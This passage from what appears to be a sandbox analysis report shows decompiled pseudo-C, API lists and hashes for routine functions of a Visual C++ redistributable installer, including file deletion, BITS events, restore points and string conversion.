				return _t22;
			}





                                                                          0x0005403c
                                                                          0x00054048
                                                                          0x00054051
                                                                          0x0005405d
                                                                          0x0005408d
                                                                          0x00054098
                                                                          0x000540a7
                                                                          0x000540ac
                                                                          0x000540ae
                                                                          0x000540af
                                                                          0x00000000
                                                                          0x000540af
                                                                          0x000540ac
                                                                          0x00054071
                                                                          0x0005407e
                                                                          0x00054083
                                                                          0x00000000
                                                                          0x00054085
                                                                          0x00054085
                                                                          0x00054086
                                                                          0x000540b4
                                                                          0x000540b4
                                                                          0x000540b9
                                                                          0x000540b9
                                                                          0x00054083
                                                                          0x000540be
                                                                          0x000540c5

                                                                          APIs
                                                                            • Part of subcall function 00054315: FindFirstFileW.KERNEL32(00038FFA,?,000002C0,00000000,00000000), ref: 00054350
                                                                            • Part of subcall function 00054315: FindClose.KERNEL32(00000000), ref: 0005435C
                                                                          • SetFileAttributesW.KERNEL32(00038FFA,00000080,00000000,00038FFA,000000FF,00000000,?,?,00038FFA), ref: 00054067
                                                                          • GetLastError.KERNEL32(?,?,00038FFA), ref: 00054071
                                                                          • DeleteFileW.KERNEL32(00038FFA,00000000,00038FFA,000000FF,00000000,?,?,00038FFA), ref: 00054090
                                                                          • GetLastError.KERNEL32(?,?,00038FFA), ref: 0005409A
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000004.00000002.376975196.0000000000011000.00000020.00000001.01000000.00000008.sdmp, Offset: 00010000, based on PE: true
                                                                          • Associated: 00000004.00000002.376949992.0000000000010000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                          • Associated: 00000004.00000002.377084608.000000000005B000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                          • Associated: 00000004.00000002.377148628.000000000007A000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                          • Associated: 00000004.00000002.377166369.000000000007E000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_4_2_10000_VC_redist.jbxd
                                                                          Similarity
                                                                          • API ID: File$ErrorFindLast$AttributesCloseDeleteFirst
                                                                          • String ID: @Met$fileutil.cpp
                                                                          • API String ID: 3967264933-2299628883
                                                                          • Opcode ID: 1a5556473779fb7c612e6ef772992ce20dc114cc502674b4d4ebe77f3845718c
                                                                          • Instruction ID: 0911ffe306115ebb78f74f7a86ecb738846d8e20ad4d15345d9cb60f02b70188
                                                                          • Opcode Fuzzy Hash: 1a5556473779fb7c612e6ef772992ce20dc114cc502674b4d4ebe77f3845718c
                                                                          • Instruction Fuzzy Hash: E8019E31A01725A7E7716AB98D08AEB7AD8EF007AAF104211FE05E60E0DB21DE8495E5
                                                                          Uniqueness

                                                                          Uniqueness Score: -1.00%

                                                                          Function 00059555 Relevance: 10.6, APIs: 3, Strings: 3, Instructions: 50COMMONLIBRARYCODE
                                                                          Download Yara Rule
                                                                          C-Code - Quality: 77%
                                                                          			E00059555() {
				intOrPtr _t1;
				_Unknown_base(*)()* _t3;
				void* _t5;
				_Unknown_base(*)()* _t6;
				struct HINSTANCE__* _t14;

				_t1 =  *0x7b708; // 0x0
				if(_t1 != 1) {
					if(_t1 == 0) {
						_t14 = GetModuleHandleW(L"KERNEL32.DLL");
						if(_t14 != 0) {
							_t3 = GetProcAddress(_t14, "AcquireSRWLockExclusive");
							if(_t3 == 0) {
								goto L5;
							} else {
								 *0x7b70c = _t3;
								_t6 = GetProcAddress(_t14, "ReleaseSRWLockExclusive");
								if(_t6 == 0) {
									goto L5;
								} else {
									 *0x7b710 = _t6;
								}
							}
						} else {
							L5:
							_t14 = 1;
						}
						asm("lock cmpxchg [edx], ecx");
						if(0 != 0 || _t14 != 1) {
							if(0 != 1) {
								_t5 = 1;
							} else {
								goto L12;
							}
						} else {
							L12:
							_t5 = 0;
						}
						return _t5;
					} else {
						return 1;
					}
				} else {
					return 0;
				}
			}








                                                                          0x00059555
                                                                          0x00059560
                                                                          0x00059568
                                                                          0x0005957a
                                                                          0x0005957e
                                                                          0x0005958a
                                                                          0x00059592
                                                                          0x00000000
                                                                          0x00059594
                                                                          0x0005959a
                                                                          0x0005959f
                                                                          0x000595a7
                                                                          0x00000000
                                                                          0x000595a9
                                                                          0x000595a9
                                                                          0x000595a9
                                                                          0x000595a7
                                                                          0x00059580
                                                                          0x00059580
                                                                          0x00059580
                                                                          0x00059580
                                                                          0x000595b7
                                                                          0x000595bd
                                                                          0x000595c5
                                                                          0x000595cb
                                                                          0x00000000
                                                                          0x00000000
                                                                          0x00000000
                                                                          0x000595c7
                                                                          0x000595c7
                                                                          0x000595c7
                                                                          0x000595c7
                                                                          0x000595cf
                                                                          0x0005956a
                                                                          0x0005956d
                                                                          0x0005956d
                                                                          0x00059562
                                                                          0x00059565
                                                                          0x00059565

                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000004.00000002.376975196.0000000000011000.00000020.00000001.01000000.00000008.sdmp, Offset: 00010000, based on PE: true
                                                                          • Associated: 00000004.00000002.376949992.0000000000010000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                          • Associated: 00000004.00000002.377084608.000000000005B000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                          • Associated: 00000004.00000002.377148628.000000000007A000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                          • Associated: 00000004.00000002.377166369.000000000007E000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_4_2_10000_VC_redist.jbxd
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID: AcquireSRWLockExclusive$KERNEL32.DLL$ReleaseSRWLockExclusive
                                                                          • API String ID: 0-1718035505
                                                                          • Opcode ID: 834e4b92f58592a464fe3df43c98e6e9084611b19f8ff5d01dc77ba79e26c0ca
                                                                          • Instruction ID: cf1baf398505cbcd8f48b9600a1156d8e9e6f3443b3cf4f3b7e6407d6cc1b657
                                                                          • Opcode Fuzzy Hash: 834e4b92f58592a464fe3df43c98e6e9084611b19f8ff5d01dc77ba79e26c0ca
                                                                          • Instruction Fuzzy Hash: 0C01D171A45B21DB5FB25EB59C846AB32C8DB81713320913AEE16D6280F71ACC69D7A0
                                                                          Uniqueness

                                                                          Uniqueness Score: -1.00%

                                                                          Function 0003D5AF Relevance: 10.5, APIs: 3, Strings: 3, Instructions: 48COMMON
                                                                          Download Yara Rule
                                                                          C-Code - Quality: 45%
                                                                          			E0003D5AF(intOrPtr* __ecx, intOrPtr _a4, intOrPtr* _a8) {
				void* _t10;
				intOrPtr* _t21;
				struct _SECURITY_ATTRIBUTES* _t22;

				_t21 = __ecx;
				_t22 = 0;
				_t1 = _t21 + 8; // 0x8
				 *__ecx = 0x706ec;
				 *(__ecx + 4) = 1;
				InitializeCriticalSection(_t1);
				_t10 = CreateEventW(0, 1, 0, 0);
				 *(_t21 + 0x28) = _t10;
				if(_t10 != 0) {
					 *((intOrPtr*)(_t21 + 0x20)) = 0;
					 *((intOrPtr*)(_t21 + 0x24)) = 0;
					 *((intOrPtr*)(_t21 + 0x2c)) = _a4;
				} else {
					_t25 =  <=  ? GetLastError() : _t14 & 0x0000ffff | 0x80070000;
					_t22 =  >=  ? 0x80004005 :  <=  ? GetLastError() : _t14 & 0x0000ffff | 0x80070000;
					E000137D3(0x80004005, "bitsengine.cpp", 0x11c, _t22);
					_push("Failed to create BITS job complete event.");
					_push(_t22);
					E0005012F();
				}
				 *_a8 = _t22;
				return _t21;
			}






                                                                          0x0003d5b4
                                                                          0x0003d5b6
                                                                          0x0003d5b8
                                                                          0x0003d5bb
                                                                          0x0003d5c2
                                                                          0x0003d5c9
                                                                          0x0003d5d4
                                                                          0x0003d5da
                                                                          0x0003d5df
                                                                          0x0003d621
                                                                          0x0003d624
                                                                          0x0003d627
                                                                          0x0003d5e1
                                                                          0x0003d5f2
                                                                          0x0003d5fc
                                                                          0x0003d60a
                                                                          0x0003d60f
                                                                          0x0003d614
                                                                          0x0003d615
                                                                          0x0003d61b
                                                                          0x0003d62d
                                                                          0x0003d634

                                                                          APIs
                                                                          • InitializeCriticalSection.KERNEL32(00000008,00000000,00000000,?,0003DD19,?,?,?,?,?,00000001,00000000,?), ref: 0003D5C9
                                                                          • CreateEventW.KERNEL32(00000000,00000001,00000000,00000000,?,0003DD19,?,?,?,?,?,00000001,00000000,?), ref: 0003D5D4
                                                                          • GetLastError.KERNEL32(?,0003DD19,?,?,?,?,?,00000001,00000000,?), ref: 0003D5E1
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000004.00000002.376975196.0000000000011000.00000020.00000001.01000000.00000008.sdmp, Offset: 00010000, based on PE: true
                                                                          • Associated: 00000004.00000002.376949992.0000000000010000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                          • Associated: 00000004.00000002.377084608.000000000005B000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                          • Associated: 00000004.00000002.377148628.000000000007A000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                          • Associated: 00000004.00000002.377166369.000000000007E000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_4_2_10000_VC_redist.jbxd
                                                                          Similarity
                                                                          • API ID: CreateCriticalErrorEventInitializeLastSection
                                                                          • String ID: @Met$Failed to create BITS job complete event.$bitsuser.cpp
                                                                          • API String ID: 3069647169-3299338690
                                                                          • Opcode ID: 9c986070d82ac0286686b58037321f7e01331fb0bef71c54b86f86eb020c00a8
                                                                          • Instruction ID: 98a584acf87ce7e85d05c89fb8bd9823deb28b3fa27a4f1436e7c61fcace3b19
                                                                          • Opcode Fuzzy Hash: 9c986070d82ac0286686b58037321f7e01331fb0bef71c54b86f86eb020c00a8
                                                                          • Instruction Fuzzy Hash: 25015E76A01726ABE3109B6AD805A87BADCFF49761F004126FD0CD7641E7B4A810CBE9
                                                                          Uniqueness

                                                                          Uniqueness Score: -1.00%

                                                                          Function 00051B28 Relevance: 10.5, APIs: 2, Strings: 4, Instructions: 43libraryloaderCOMMON
                                                                          Download Yara Rule
                                                                          C-Code - Quality: 100%
                                                                          			E00051B28(void* __edx, intOrPtr _a4) {
				_Unknown_base(*)()* _t3;
				void* _t10;
				void* _t11;

				_t10 = __edx;
				_t11 = E000137D6(L"srclient.dll", 0x7b678);
				if(_t11 >= 0) {
					_t3 = GetProcAddress( *0x7b678, "SRSetRestorePointW");
					 *0x7b67c = _t3;
					if(_t3 != 0) {
						if(_a4 != 0) {
							_t11 = E000515CB(_t10);
						}
					} else {
						_t14 =  <=  ? GetLastError() : _t7 & 0x0000ffff | 0x80070000;
						_t11 =  >=  ? 0x80004005 :  <=  ? GetLastError() : _t7 & 0x0000ffff | 0x80070000;
						E000137D3(0x80004005, "srputil.cpp", 0x1f, _t11);
					}
					if(_t11 >= 0) {
						goto L9;
					} else {
						goto L7;
					}
				} else {
					_t11 = 0x80004001;
					L7:
					if( *0x7b678 != 0) {
						E00051BB5();
					}
					L9:
					return _t11;
				}
			}






                                                                          0x00051b28
                                                                          0x00051b3b
                                                                          0x00051b3f
                                                                          0x00051b53
                                                                          0x00051b59
                                                                          0x00051b60
                                                                          0x00051b93
                                                                          0x00051b9a
                                                                          0x00051b9a
                                                                          0x00051b62
                                                                          0x00051b73
                                                                          0x00051b7d
                                                                          0x00051b88
                                                                          0x00051b88
                                                                          0x00051b9e
                                                                          0x00000000
                                                                          0x00000000
                                                                          0x00000000
                                                                          0x00000000
                                                                          0x00051b41
                                                                          0x00051b41
                                                                          0x00051ba0
                                                                          0x00051ba7
                                                                          0x00051ba9
                                                                          0x00051ba9
                                                                          0x00051bae
                                                                          0x00051bb2
                                                                          0x00051bb2

                                                                          APIs
                                                                          • GetProcAddress.KERNEL32(SRSetRestorePointW,srclient.dll), ref: 00051B53
                                                                          • GetLastError.KERNEL32(?,000148D4,00000001,?,?,0001444C,?,?,?,?,0001535E,?,?,?,?), ref: 00051B62
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000004.00000002.376975196.0000000000011000.00000020.00000001.01000000.00000008.sdmp, Offset: 00010000, based on PE: true
                                                                          • Associated: 00000004.00000002.376949992.0000000000010000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                          • Associated: 00000004.00000002.377084608.000000000005B000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                          • Associated: 00000004.00000002.377148628.000000000007A000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                          • Associated: 00000004.00000002.377166369.000000000007E000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_4_2_10000_VC_redist.jbxd
                                                                          Similarity
                                                                          • API ID: AddressErrorLastProc
                                                                          • String ID: @Met$SRSetRestorePointW$srclient.dll$srputil.cpp
                                                                          • API String ID: 199729137-922541083
                                                                          • Opcode ID: e8987b2da2e9676293f97817585389843a833d66c7b05ee3a27e9efd377f758b
                                                                          • Instruction ID: 52b465b276fb3183e712dfbaab9e8be2b51917baac0a49ad92a8a354aec5b56f
                                                                          • Opcode Fuzzy Hash: e8987b2da2e9676293f97817585389843a833d66c7b05ee3a27e9efd377f758b
                                                                          • Instruction Fuzzy Hash: 3FF08676E4072197F73116B58C097E775849F00B66F014121AE05BA292EB6ECC8486E5
                                                                          Uniqueness

                                                                          Uniqueness Score: -1.00%

                                                                          Function 0004A059 Relevance: 9.2, APIs: 6, Instructions: 216COMMONLIBRARYCODE
                                                                          Download Yara Rule
                                                                          C-Code - Quality: 71%
                                                                          			E0004A059(void* __ecx, intOrPtr* _a4, intOrPtr _a8, signed int _a12, char* _a16, int _a20, intOrPtr _a24, short* _a28, int _a32, intOrPtr _a36) {
				signed int _v8;
				int _v12;
				void* _v24;
				void* __ebx;
				void* __edi;
				void* __esi;
				void* __ebp;
				signed int _t49;
				signed int _t54;
				int _t58;
				signed int _t60;
				short* _t62;
				signed int _t66;
				short* _t70;
				int _t71;
				int _t78;
				void* _t80;
				short* _t81;
				signed int _t87;
				signed int _t90;
				void* _t95;
				int _t97;
				void* _t98;
				short* _t100;
				int _t102;
				void* _t103;
				signed int _t105;
				short* _t106;
				void* _t109;

				_push(__ecx);
				_push(__ecx);
				_t49 =  *0x7a008; // 0xfbf51acb
				_v8 = _t49 ^ _t105;
				_t102 = _a20;
				if(_t102 > 0) {
					_t78 = E0004C675(_a16, _t102);
					_t109 = _t78 - _t102;
					_t4 = _t78 + 1; // 0x1
					_t102 = _t4;
					if(_t109 >= 0) {
						_t102 = _t78;
					}
				}
				_t97 = _a32;
				if(_t97 == 0) {
					_t97 =  *( *_a4 + 8);
					_a32 = _t97;
				}
				_t54 = MultiByteToWideChar(_t97, 1 + (0 | _a36 != 0x00000000) * 8, _a16, _t102, 0, 0);
				_v12 = _t54;
				if(_t54 == 0) {
					L38:
					_pop(_t98);
					_pop(_t103);
					_pop(_t80);
					return E0003DE36(_t80, _v8 ^ _t105, _t95, _t98, _t103);
				} else {
					_t95 = _t54 + _t54;
					_t85 = _t95 + 8;
					asm("sbb eax, eax");
					if((_t95 + 0x00000008 & _t54) == 0) {
						_t81 = 0;
						__eflags = 0;
						L14:
						if(_t81 == 0) {
							L36:
							_t104 = 0;
							L37:
							E000491C7(_t81);
							goto L38;
						}
						_t58 = MultiByteToWideChar(_t97, 1, _a16, _t102, _t81, _v12);
						_t120 = _t58;
						if(_t58 == 0) {
							goto L36;
						}
						_t99 = _v12;
						_t60 = E00048969(_t81, _t85, _v12, _t120, _a8, _a12, _t81, _v12, 0, 0, 0, 0, 0);
						_t104 = _t60;
						if(_t104 == 0) {
							goto L36;
						}
						if((_a12 & 0x00000400) == 0) {
							_t95 = _t104 + _t104;
							_t87 = _t95 + 8;
							__eflags = _t95 - _t87;
							asm("sbb eax, eax");
							__eflags = _t87 & _t60;
							if((_t87 & _t60) == 0) {
								_t100 = 0;
								__eflags = 0;
								L30:
								__eflags = _t100;
								if(__eflags == 0) {
									L35:
									E000491C7(_t100);
									goto L36;
								}
								_t62 = E00048969(_t81, _t87, _t100, __eflags, _a8, _a12, _t81, _v12, _t100, _t104, 0, 0, 0);
								__eflags = _t62;
								if(_t62 == 0) {
									goto L35;
								}
								_push(0);
								_push(0);
								__eflags = _a28;
								if(_a28 != 0) {
									_push(_a28);
									_push(_a24);
								} else {
									_push(0);
									_push(0);
								}
								_t104 = WideCharToMultiByte(_a32, 0, _t100, _t104, ??, ??, ??, ??);
								__eflags = _t104;
								if(_t104 != 0) {
									E000491C7(_t100);
									goto L37;
								} else {
									goto L35;
								}
							}
							_t90 = _t95 + 8;
							__eflags = _t95 - _t90;
							asm("sbb eax, eax");
							_t66 = _t60 & _t90;
							_t87 = _t95 + 8;
							__eflags = _t66 - 0x400;
							if(_t66 > 0x400) {
								__eflags = _t95 - _t87;
								asm("sbb eax, eax");
								_t100 = E00045154(_t87, _t66 & _t87);
								_pop(_t87);
								__eflags = _t100;
								if(_t100 == 0) {
									goto L35;
								}
								 *_t100 = 0xdddd;
								L28:
								_t100 =  &(_t100[4]);
								goto L30;
							}
							__eflags = _t95 - _t87;
							asm("sbb eax, eax");
							E00059DF0();
							_t100 = _t106;
							__eflags = _t100;
							if(_t100 == 0) {
								goto L35;
							}
							 *_t100 = 0xcccc;
							goto L28;
						}
						_t70 = _a28;
						if(_t70 == 0) {
							goto L37;
						}
						_t124 = _t104 - _t70;
						if(_t104 > _t70) {
							goto L36;
						}
						_t71 = E00048969(_t81, 0, _t99, _t124, _a8, _a12, _t81, _t99, _a24, _t70, 0, 0, 0);
						_t104 = _t71;
						if(_t71 != 0) {
							goto L37;
						}
						goto L36;
					}
					asm("sbb eax, eax");
					_t72 = _t54 & _t95 + 0x00000008;
					_t85 = _t95 + 8;
					if((_t54 & _t95 + 0x00000008) > 0x400) {
						__eflags = _t95 - _t85;
						asm("sbb eax, eax");
						_t81 = E00045154(_t85, _t72 & _t85);
						_pop(_t85);
						__eflags = _t81;
						if(__eflags == 0) {
							goto L36;
						}
						 *_t81 = 0xdddd;
						L12:
						_t81 =  &(_t81[4]);
						goto L14;
					}
					asm("sbb eax, eax");
					E00059DF0();
					_t81 = _t106;
					if(_t81 == 0) {
						goto L36;
					}
					 *_t81 = 0xcccc;
					goto L12;
				}
			}
































                                                                          0x0004a05e
                                                                          0x0004a05f
                                                                          0x0004a060
                                                                          0x0004a067
                                                                          0x0004a06c
                                                                          0x0004a072
                                                                          0x0004a078
                                                                          0x0004a07e
                                                                          0x0004a081
                                                                          0x0004a081
                                                                          0x0004a084
                                                                          0x0004a086
                                                                          0x0004a086
                                                                          0x0004a084
                                                                          0x0004a088
                                                                          0x0004a08d
                                                                          0x0004a094
                                                                          0x0004a097
                                                                          0x0004a097
                                                                          0x0004a0b3
                                                                          0x0004a0b9
                                                                          0x0004a0be
                                                                          0x0004a251
                                                                          0x0004a254
                                                                          0x0004a255
                                                                          0x0004a256
                                                                          0x0004a264
                                                                          0x0004a0c4
                                                                          0x0004a0c4
                                                                          0x0004a0c7
                                                                          0x0004a0cc
                                                                          0x0004a0d0
                                                                          0x0004a124
                                                                          0x0004a124
                                                                          0x0004a126
                                                                          0x0004a128
                                                                          0x0004a246
                                                                          0x0004a246
                                                                          0x0004a248
                                                                          0x0004a249
                                                                          0x00000000
                                                                          0x0004a24f
                                                                          0x0004a139
                                                                          0x0004a13f
                                                                          0x0004a141
                                                                          0x00000000
                                                                          0x00000000
                                                                          0x0004a147
                                                                          0x0004a159
                                                                          0x0004a15e
                                                                          0x0004a162
                                                                          0x00000000
                                                                          0x00000000
                                                                          0x0004a16f
                                                                          0x0004a1a9
                                                                          0x0004a1ac
                                                                          0x0004a1af
                                                                          0x0004a1b1
                                                                          0x0004a1b3
                                                                          0x0004a1b5
                                                                          0x0004a201
                                                                          0x0004a201
                                                                          0x0004a203
                                                                          0x0004a203
                                                                          0x0004a205
                                                                          0x0004a23f
                                                                          0x0004a240
                                                                          0x00000000
                                                                          0x0004a245
                                                                          0x0004a219
                                                                          0x0004a21e
                                                                          0x0004a220
                                                                          0x00000000
                                                                          0x00000000
                                                                          0x0004a224
                                                                          0x0004a225
                                                                          0x0004a226
                                                                          0x0004a229
                                                                          0x0004a265
                                                                          0x0004a268
                                                                          0x0004a22b
                                                                          0x0004a22b
                                                                          0x0004a22c
                                                                          0x0004a22c
                                                                          0x0004a239
                                                                          0x0004a23b
                                                                          0x0004a23d
                                                                          0x0004a26e
                                                                          0x00000000
                                                                          0x00000000
                                                                          0x00000000
                                                                          0x00000000
                                                                          0x0004a23d
                                                                          0x0004a1b7
                                                                          0x0004a1ba
                                                                          0x0004a1bc
                                                                          0x0004a1be
                                                                          0x0004a1c0
                                                                          0x0004a1c3
                                                                          0x0004a1c8
                                                                          0x0004a1e3
                                                                          0x0004a1e5
                                                                          0x0004a1ef
                                                                          0x0004a1f1
                                                                          0x0004a1f2
                                                                          0x0004a1f4
                                                                          0x00000000
                                                                          0x00000000
                                                                          0x0004a1f6
                                                                          0x0004a1fc
                                                                          0x0004a1fc
                                                                          0x00000000
                                                                          0x0004a1fc
                                                                          0x0004a1ca
                                                                          0x0004a1cc
                                                                          0x0004a1d0
                                                                          0x0004a1d5
                                                                          0x0004a1d7
                                                                          0x0004a1d9
                                                                          0x00000000
                                                                          0x00000000
                                                                          0x0004a1db
                                                                          0x00000000
                                                                          0x0004a1db
                                                                          0x0004a171
                                                                          0x0004a176
                                                                          0x00000000
                                                                          0x00000000
                                                                          0x0004a17c
                                                                          0x0004a17e
                                                                          0x00000000
                                                                          0x00000000
                                                                          0x0004a195
                                                                          0x0004a19a
                                                                          0x0004a19e
                                                                          0x00000000
                                                                          0x00000000
                                                                          0x00000000
                                                                          0x0004a1a4
                                                                          0x0004a0d7
                                                                          0x0004a0d9
                                                                          0x0004a0db
                                                                          0x0004a0e3
                                                                          0x0004a102
                                                                          0x0004a104
                                                                          0x0004a10e
                                                                          0x0004a110
                                                                          0x0004a111
                                                                          0x0004a113
                                                                          0x00000000
                                                                          0x00000000
                                                                          0x0004a119
                                                                          0x0004a11f
                                                                          0x0004a11f
                                                                          0x00000000
                                                                          0x0004a11f
                                                                          0x0004a0e7
                                                                          0x0004a0eb
                                                                          0x0004a0f0
                                                                          0x0004a0f4
                                                                          0x00000000
                                                                          0x00000000
                                                                          0x0004a0fa
                                                                          0x00000000
                                                                          0x0004a0fa

                                                                          APIs
                                                                          • MultiByteToWideChar.KERNEL32(00000001,00000000,?,?,00000000,00000000,?,00043382,00043382,?,?,?,0004A2AA,00000001,00000001,E3E85006), ref: 0004A0B3
                                                                          • MultiByteToWideChar.KERNEL32(00000001,00000001,?,?,00000000,?,?,?,?,0004A2AA,00000001,00000001,E3E85006,?,?,?), ref: 0004A139
                                                                          • WideCharToMultiByte.KERNEL32(00000001,00000000,00000000,00000000,?,E3E85006,00000000,00000000,?,00000400,00000000,?,00000000,00000000,00000000,00000000), ref: 0004A233
                                                                          • __freea.LIBCMT ref: 0004A240
                                                                            • Part of subcall function 00045154: HeapAlloc.KERNEL32(00000000,?,?,?,00041E90,?,0000015D,?,?,?,?,000432E9,000000FF,00000000,?,?), ref: 00045186
                                                                          • __freea.LIBCMT ref: 0004A249
                                                                          • __freea.LIBCMT ref: 0004A26E
                                                                          Memory Dump Source
                                                                          • Source File: 00000004.00000002.376975196.0000000000011000.00000020.00000001.01000000.00000008.sdmp, Offset: 00010000, based on PE: true
                                                                          • Associated: 00000004.00000002.376949992.0000000000010000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                          • Associated: 00000004.00000002.377084608.000000000005B000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                          • Associated: 00000004.00000002.377148628.000000000007A000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                          • Associated: 00000004.00000002.377166369.000000000007E000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_4_2_10000_VC_redist.jbxd
                                                                          Similarity
                                                                          • API ID: ByteCharMultiWide__freea$AllocHeap
                                                                          • String ID:
                                                                          • API String ID: 3147120248-0
                                                                          • Opcode ID: b1ae6988368bb28bac7685b5c85c6eae5a76d9a76d9ad07e0d7b5e6f499e819c
                                                                          • Instruction ID: ef813050570518af4066906882bd15e3f75dde1236cda2c9271930218f519b2f
                                                                          • Opcode Fuzzy Hash: b1ae6988368bb28bac7685b5c85c6eae5a76d9a76d9ad07e0d7b5e6f499e819c
                                                                          • Instruction Fuzzy Hash: 855123B2740206AFEB258F68CD81EBF77A9EB46750F144238FC04E6191EB75DC40D669
                                                                          Uniqueness

                                                                          Uniqueness Score: -1.00%

                                                                          Function 0002F6B8 Relevance: 9.1, APIs: 2, Strings: 4, Instructions: 138COMMON
                                                                          Download Yara Rule
                                                                          C-Code - Quality: 78%
                                                                          			E0002F6B8(void* __ecx, intOrPtr _a4, intOrPtr* _a8, intOrPtr* _a12, intOrPtr _a16, intOrPtr _a20, intOrPtr _a24, intOrPtr _a28, intOrPtr _a32) {
				char _v8;
				char _v12;
				void* __ebx;
				void* __edi;
				intOrPtr* _t43;
				intOrPtr _t50;
				intOrPtr* _t66;
				void* _t71;
				intOrPtr _t76;
				char _t79;

				_push(__ecx);
				_push(__ecx);
				_t76 = _a4;
				_t79 = 0;
				_v8 = 0;
				_v12 = 0;
				EnterCriticalSection( *(_t76 + 0xc));
				_t66 = _a8;
				if(_t66 == 0 ||  *_t66 == 0) {
					_t43 = _a12;
					if(_t43 == 0 ||  *_t43 == 0) {
						E0001E79A(_t66, 0, _t76,  *(_t76 + 0xc) + 0x2f0);
					} else {
						goto L4;
					}
				} else {
					L4:
					_t50 = _a28;
					if(_a24 != _t79) {
						if(_a24 != 1 || _a32 == 0x14 && _t50 != 0) {
							goto L7;
						} else {
							goto L15;
						}
					} else {
						if(_a32 != _t79 || _t50 != 0) {
							L15:
							_t79 = 0x80070057;
						} else {
							L7:
							E0001E79A(_t66, 0, _t76,  *(_t76 + 0xc) + 0x2f0);
							if(_t66 == 0) {
								L9:
								if(E00011F20( &_v8, L"update\\%ls",  *((intOrPtr*)( *(_t76 + 0xc) + 0x148))) >= 0) {
									_t71 = 0;
									goto L17;
								} else {
									_push("Failed to default local update source");
									goto L11;
								}
							} else {
								_t71 = 0;
								if( *_t66 != 0) {
									L17:
									if(E00027C29(_t71,  &_v12, 5,  *((intOrPtr*)( *(_t76 + 0xc) + 0x20)),  *((intOrPtr*)( *(_t76 + 0xc) + 0x24)), _t71, _t71,  *((intOrPtr*)( *(_t76 + 0xc) + 0x140)),  *((intOrPtr*)(_t57 + 0x1c0)), _t71,  *((intOrPtr*)(_t57 + 0x28))) >= 0) {
										_t60 =  *(_t76 + 0xc);
										_t68 =  !=  ? _v8 : _t66;
										_t79 = E0003C0FA( !=  ? _v8 : _t66, 0, _t76, 0x126e0000, 0x3000a,  *(_t76 + 0xc) + 0x2f8, 0,  *((intOrPtr*)( *(_t76 + 0xc) + 0x110)), 6, 2,  *((intOrPtr*)(_t60 + 0x148)),  !=  ? _v8 : _t66, _a12, _a16, _a20, 1, _v12, 0, 0, 0, _a28, _a32);
										if(_t79 >= 0) {
											 *((intOrPtr*)( *(_t76 + 0xc) + 0x2f0)) = 1;
										} else {
											_push("Failed to set update bundle.");
											goto L11;
										}
									} else {
										_push("Failed to recreate command-line for update bundle.");
										L11:
										_push(_t79);
										E0005012F();
									}
								} else {
									goto L9;
								}
							}
						}
					}
				}
				LeaveCriticalSection( *(_t76 + 0xc));
				if(_v12 != 0) {
					E000554EF(_v12);
				}
				if(_v8 != 0) {
					E000554EF(_v8);
				}
				return _t79;
			}













                                                                          0x0002f6bb
                                                                          0x0002f6bc
                                                                          0x0002f6c0
                                                                          0x0002f6c5
                                                                          0x0002f6c7
                                                                          0x0002f6ca
                                                                          0x0002f6d0
                                                                          0x0002f6d6
                                                                          0x0002f6dd
                                                                          0x0002f6e4
                                                                          0x0002f6e9
                                                                          0x0002f815
                                                                          0x00000000
                                                                          0x00000000
                                                                          0x00000000
                                                                          0x0002f6f8
                                                                          0x0002f6f8
                                                                          0x0002f6f8
                                                                          0x0002f6fe
                                                                          0x0002f758
                                                                          0x00000000
                                                                          0x00000000
                                                                          0x00000000
                                                                          0x00000000
                                                                          0x0002f700
                                                                          0x0002f703
                                                                          0x0002f764
                                                                          0x0002f764
                                                                          0x0002f709
                                                                          0x0002f709
                                                                          0x0002f712
                                                                          0x0002f719
                                                                          0x0002f722
                                                                          0x0002f740
                                                                          0x0002f76e
                                                                          0x00000000
                                                                          0x0002f742
                                                                          0x0002f742
                                                                          0x00000000
                                                                          0x0002f742
                                                                          0x0002f71b
                                                                          0x0002f71b
                                                                          0x0002f720
                                                                          0x0002f770
                                                                          0x0002f79a
                                                                          0x0002f7a6
                                                                          0x0002f7b2
                                                                          0x0002f7ed
                                                                          0x0002f7f1
                                                                          0x0002f800
                                                                          0x0002f7f3
                                                                          0x0002f7f3
                                                                          0x00000000
                                                                          0x0002f7f3
                                                                          0x0002f79c
                                                                          0x0002f79c
                                                                          0x0002f747
                                                                          0x0002f747
                                                                          0x0002f748
                                                                          0x0002f74e
                                                                          0x00000000
                                                                          0x00000000
                                                                          0x00000000
                                                                          0x0002f720
                                                                          0x0002f719
                                                                          0x0002f703
                                                                          0x0002f6fe
                                                                          0x0002f81d
                                                                          0x0002f827
                                                                          0x0002f82c
                                                                          0x0002f82c
                                                                          0x0002f835
                                                                          0x0002f83a
                                                                          0x0002f83a
                                                                          0x0002f847

                                                                          APIs
                                                                          • EnterCriticalSection.KERNEL32(?), ref: 0002F6D0
                                                                          • LeaveCriticalSection.KERNEL32(?,?), ref: 0002F81D
                                                                          Strings
